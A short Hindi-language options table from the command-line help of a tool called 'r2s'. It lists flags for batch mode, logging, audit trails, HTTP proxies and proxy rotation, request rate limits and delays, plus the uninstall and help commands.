--batchबैच मोड: सभी इंटरैक्टिव प्रॉम्प्ट छोड़ें, स्वतः जारी रखें (ऑटोमेशन के लिए उपयोगी)
--no-report~/.r2s/reports/ में स्वचालित रिपोर्ट सहेजना अक्षम करें
--log FILEसभी ऑपरेशनों को निर्दिष्ट फ़ाइल में लॉग करें (विस्तृत ऑपरेशन लॉग)
--auditविस्तृत ऑडिट ट्रेल बनाएँ (~/.r2s/logs/audit.log में सहेजा जाता है)
विकल्पविवरण
--proxy URLHTTP प्रॉक्सी का उपयोग करें (प्रारूप: http://proxy:port या http://user:pass@proxy:port)
--proxy-file FILEफ़ाइल से प्रॉक्सी लोड और रोटेट करें (प्रति पंक्ति एक प्रॉक्सी, प्रारूप: http://proxy:port)
--rate RATEअनुरोधों को प्रति सेकंड RATE अनुरोधों तक सीमित करें (लक्ष्य पर अत्यधिक भार रोकता है)
--delay SECONDSअनुरोधों के बीच सेकंड में देरी जोड़ें (रेट लिमिटिंग से बचने में मदद करता है)
r2s uninstallR2S बाइनरी और सभी डेटा अनइंस्टॉल करें
r2s helpसहायता संदेश दिखाएँ